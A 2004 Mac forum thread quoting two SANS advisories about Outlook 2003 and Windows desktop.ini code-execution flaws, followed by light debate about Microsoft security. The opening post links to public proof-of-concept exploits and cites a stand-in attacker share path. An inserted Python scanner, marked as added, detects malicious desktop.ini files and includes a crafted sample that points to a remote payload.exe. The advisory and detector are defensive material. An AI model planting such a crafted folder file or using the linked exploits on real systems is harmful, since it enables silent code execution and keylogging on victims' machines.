New Windows vulnerabilities

Discussion in 'General Mac Discussion' started by Westside guy, May 24, 2004.

  1. macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy part of the Pacific NW
    #1
    Hi there,

    Not sure how to post this without starting a flame war. :D But (mainly for the "Windows is only vulnerable due to non-patched machines" crowd) I thought it was worth mentioning two recently announced vulnerabilities hot off the SANS newswire. They're the first not-already-patched exploits I've seen in several weeks, but it's not an uncommon problem.

    Out of fairness I'll also point out the same issue listed the OS X "Help Protocol" exploit, which was patched last Friday.

    #1 HIGH: Microsoft Outlook Arbitrary Code Execution
    Affected: Outlook 2003

    Description: The default security setting of Outlook 2003 ("Restricted Zone") does not allow execution of Active-X controls and arbitrary scripts. However, it is reported that an email containing an embedded OLE object, such as a Windows media player, can bypass these security checks. By exploiting this flaw in conjunction with Outlook's flaw of storing files specified in "img" tags at a predictable location, it may be possible to silently execute arbitrary code on the client system. The code would execute with the privileges of the logged-on user. A proof-of-concept exploit has been posted.

    Status: Microsoft has not confirmed, no updates available.

    References:
    Postings by http-equiv
    http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0058.html
    http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0056.html
    Proof-of-Concept Exploit
    http://www.malware.com/rockIT.zip
    OLE Concepts
    http://support.microsoft.com/support/kb/articles/Q86/0/08.asp&NoWebContent=1
    SecurityFocus BIDs
    http://www.securityfocus.com/bid/10369
    http://www.securityfocus.com/bid/10307

    #2 MODERATE: Windows Folder Arbitrary Code Execution
    Affected: Windows XP/2000

    Description: The "desktop.ini" file, hidden when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program. This can be exploited to execute arbitrary code on a client system when an unsuspecting user opens such a specially crafted folder. To exploit the flaw, an attacker would have to create the malicious "shared" folder and entice a victim to open it. The attacker can include the folder's URI (e.g. \\attacker-ip\bad-folder) in a webpage or email it to a potential victim. A proof-of-concept exploit that installs a keylogger on the client system has been publicly posted.

    Status: Microsoft has not confirmed, no patches available. Block the ports 139/tcp and 445/tcp at the network perimeter to prevent attacks from the Internet.

    References:
    Posting by Roozbeh Afrasiabi
    http://www.securityfocus.com/archive/1/363590/2004-05-17/2004-05-23/0
    Proof-of-Concept Exploit
    http://www.freewebs.com/roozbeh_afrasiabi/xploit/execute.htm
    Desktop.ini File Details
    http://msdn.microsoft.com/library/e...hell_basics/shell_basics_extending/custom.asp
    SecurityFocus BID
    http://www.securityfocus.com/bid/10363
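    A defensive check for the second advisory, added here as an example and not part of the thread or the SANS text: it walks a directory tree and flags any desktop.ini whose [.ShellClassInfo] entries point at a program file or at a remote (UNC) share. The extension list, the sample files and the decision to treat icon references into system DLLs as normal are constructed assumptions.

```python
import re
from pathlib import Path

# Extensions Windows launches as a program (constructed list; not taken from the advisory).
PROGRAM_EXTS = {"exe", "com", "scr", "bat", "cmd", "pif", "cpl", "hta", "vbs", "js"}
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")  # \\host\share\...
EXT_RE = re.compile(r"\.([A-Za-z0-9]{1,4})$")

def parse_ini(text: str) -> dict[str, list[tuple[str, str]]]:
    """Minimal INI reader: lower-cased section name -> list of (key, value).
    Tolerates lines without '=' and duplicate keys, which configparser rejects."""
    sections: dict[str, list[tuple[str, str]]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections

def suspicious_entries(ini_text: str) -> list[tuple[str, str]]:
    """[.ShellClassInfo] entries whose target is a program file or lives on a remote (UNC) share.
    Icon references into system DLLs (the common benign case) are deliberately not flagged."""
    hits = []
    for key, value in parse_ini(ini_text).get(".shellclassinfo", []):
        target = value.split(",")[0].strip().strip('"')  # 'IconFile=x.exe,0' -> 'x.exe'
        m = EXT_RE.search(target)
        if (m and m.group(1).lower() in PROGRAM_EXTS) or UNC_PATH.match(target):
            hits.append((key, value))
    return hits

def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Walk a directory tree and report every desktop.ini with suspicious entries."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.lower() == "desktop.ini":
            hits = suspicious_entries(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed samples: a normal desktop.ini and a crafted one pointing at a program on a share.
BENIGN = "[.ShellClassInfo]\r\nIconResource=%SystemRoot%\\system32\\shell32.dll,3\r\n[ViewState]\r\nMode=\r\n"
CRAFTED = "[.shellclassinfo]\r\nIconFile=\\\\attacker-ip\\bad-folder\\payload.exe,0\r\nInfoTip=Photos\r\n"
```

    Calling scan_tree on an extracted archive or a mapped share returns a path-to-findings map; an empty map means no desktop.ini in the tree referenced a program or a remote path.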
     
  2. Moderator emeritus

    robbieduncan

    Joined:
    Jul 24, 2002
    Location:
    London
    #2
    Whilst unsurprising that there are undiscovered flaws in MS programs the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.
     
  3. macrumors 68030

    johnnyjibbs

    Joined:
    Sep 18, 2003
    Location:
    London, UK
    #3
    How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D
     
  4. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #4
    Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!
     
  5. macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #5
    This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.
     
  6. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #6
    I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).
     
  7. macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #7
    Either way, it doesn't matter. My mind is computing data well today anyway, so I could be wrong as well. :)
     
  8. Moderator emeritus

    edesignuk

    Joined:
    Mar 25, 2002
    Location:
    London, England
    #8
    Don't forget IIS! That's a biggie! :eek:
     
  9. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #9
    IMO, Microsoft's IIS has as many security holes as 2,000 slices of Swiss cheese (which is FAR too many).
     
  10. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #10
    Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised it's floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PCs.... :D
     
  11. thread starter macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy part of the Pacific NW
    #11
    This poster's original logic was thus: While this is indeed a flaw in Outlook, because of the way Windows is constructed many "Outlook flaws" end up actually residing in Internet Explorer's code base (don't know about this one). As such, they are often part of the actual operating system code rather than stand-alone. That's why some recent "Outlook flaws" were exploitable whether or not Outlook was actually running.

    Also, there are lots of cross-dependencies on Windows. I know on our home XP box we cannot (at least according to XP) uninstall Outlook without breaking some other programs' functionality - even though we don't use Outlook.
     
  12. macrumors 68000

    Mav451

    Joined:
    Jul 1, 2003
    Location:
    Maryland
    #12
    Haha, I haven't heard the term "active desktop" since 1999...talk about a trip through time.
     
  13. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #13
    My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).
     
  14. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #14
    Oh, sorry. LOL this is what I was thinking of when I said active desktop. :eek: I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.

    But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?
     
  15. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #15
    You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.
     
  16. macrumors 603

    SiliconAddict

    Joined:
    Jun 19, 2003
    Location:
    Chicago, IL
    #16

    Win98 started it and it is the most annoying thing on the planet. I can't tell you how many damn times I've had the wonderful error message of "Can not delete file. File is in use" or something along those lines simply because MS is previewing the damn thing in the web portion of the file browser. I ALWAYS turn this feature off for several reasons the biggest being that it slows down the browsing process. When I'm powering through a folder structure to move files I don't need a damn cute web interface to get in the way. Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

    Beyond that, #1 doesn't affect me since my mail server bounces back any HTML mail to the sender with a nice message. "Please send any e-mails to Jonathan in non-HTML format. Thanks." I neither care for nor need HTML mail. Give me RTF text. That's good enough for me and it guarantees that a script isn't going to be embedded into my email that will decimate my computer.
     
  17. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #17
    Yeah, I love this feature too -- especially with autocomplete. I use it like crazy. When the whole active desktop / MSIE integration issue was floating around, I was worried that they would remove this in order to comply with the ruling! :( So I was glad they didn't....
     
